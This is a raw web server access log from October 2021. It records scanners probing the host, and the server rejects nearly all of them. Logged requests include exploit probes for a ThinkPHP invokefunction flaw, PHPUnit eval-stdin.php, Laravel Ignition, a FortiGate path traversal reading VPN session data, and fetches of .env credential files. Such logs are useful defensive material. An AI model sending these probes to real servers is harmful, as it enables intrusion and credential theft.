"Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:20:25:42 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Oct/2021:22:12:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 8.133.171.181] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Oct/2021:22:48:26 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:26 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:28 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:28 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:30 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:30 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [23/Oct/2021:22:48:32 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:32 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:33 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Oct/2021:22:48:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:37 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Oct/2021:22:48:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:01:43:54 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.183] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:03:26:55 +0000] 444 - GET https speedtest.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [24/Oct/2021:04:17:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Oct/2021:04:26:06 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.105.127] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Oct/2021:05:06:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.193.131] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:05:07:10 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.205.170] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:05:08:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.125] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:05:12:24 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Oct/2021:05:51:04 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Oct/2021:06:58:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.194] [Length 0] [Gzip -] "-" "-" [24/Oct/2021:07:52:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Oct/2021:08:03:19 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.49.68.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [24/Oct/2021:08:34:03 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:09:03:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [24/Oct/2021:09:03:16 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211024170129" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [24/Oct/2021:09:41:58 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 45.6.96.41] [Length 0] [Gzip -] "curl/7.64.0" "-" [24/Oct/2021:09:41:58 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 45.6.96.41] [Length 0] [Gzip -] "curl/7.64.0" "-" [24/Oct/2021:11:03:37 +0000] 444 - GET https whoami.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [24/Oct/2021:11:05:43 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Oct/2021:12:03:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.41] [Length 0] [Gzip -] "-" "-" [24/Oct/2021:12:03:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "-" "-" [24/Oct/2021:12:03:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Oct/2021:12:05:28 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 178.239.21.161] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [24/Oct/2021:12:14:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Oct/2021:12:35:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.159] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [24/Oct/2021:12:35:11 +0000] 400 - - https localhost "-" [Client 23.129.64.159] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:12:35:15 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.32] [Length 0] [Gzip -] "-" "-" [24/Oct/2021:12:35:17 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.220.101.32] [Length 0] [Gzip -] "-" "-" [24/Oct/2021:12:35:23 +0000] 400 - - https localhost "-" [Client 178.17.174.14] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:12:42:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Oct/2021:13:09:45 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.198.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:13:36:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.43] [Length 0] [Gzip -] "-" "-" [24/Oct/2021:13:36:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "-" "-" [24/Oct/2021:13:36:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Oct/2021:13:44:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.198.139] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Oct/2021:14:13:28 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:28 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:32 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:32 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:14:13:32 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:33 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:35 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:35 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:35 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Oct/2021:14:13:37 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [24/Oct/2021:15:13:58 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:15:15:03 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:15:16:32 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [24/Oct/2021:15:32:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Oct/2021:15:34:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.201.237.39] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3090.91 Safari/537.32" "-" [24/Oct/2021:15:34:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 52.201.237.39] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3090.91 Safari/537.32" "-" [24/Oct/2021:15:45:53 +0000] 400 - - http localhost "-" [Client 49.51.184.80] [Length 154] [Gzip -] "-" "-" [24/Oct/2021:16:02:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.184.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Oct/2021:16:02:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.184.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Oct/2021:16:02:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.184.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Oct/2021:16:02:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 49.51.184.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [24/Oct/2021:16:07:04 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.41] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Oct/2021:19:50:12 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Oct/2021:21:43:39 +0000] 444 - GET https opds.moralanimal.net "/wp-login.php" [Client 141.98.9.3] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [24/Oct/2021:22:57:04 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:05:12 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Oct/2021:23:22:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:01:44:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.117] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:01:46:03 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.197.189] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:03:15:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:03:43:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.50] [Length 0] [Gzip -] "-" "-" [25/Oct/2021:03:51:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [25/Oct/2021:03:52:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.32.180] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [25/Oct/2021:03:53:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.91.96.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [25/Oct/2021:04:12:21 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 45.61.146.242] [Length 0] [Gzip -] "httpx - Open-source project (github.com/projectdiscovery/httpx)" "-" [25/Oct/2021:04:34:47 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:47 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:48 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:51 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:56 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:57 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:58 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:34:58 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Oct/2021:04:35:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:35:01 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Oct/2021:04:35:04 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [25/Oct/2021:05:06:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:05:07:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:05:08:18 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:05:41:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [25/Oct/2021:07:07:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.67] [Length 0] [Gzip -] "-" "-" [25/Oct/2021:07:40:18 +0000] 400 - GET http localhost "/" [Client 143.110.209.25] [Length 252] [Gzip -] "-" "-" [25/Oct/2021:08:21:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Oct/2021:08:38:10 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.208.74] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Oct/2021:08:54:32 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.41.12] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Oct/2021:10:45:24 +0000] 400 - GET http 64.22.31.253 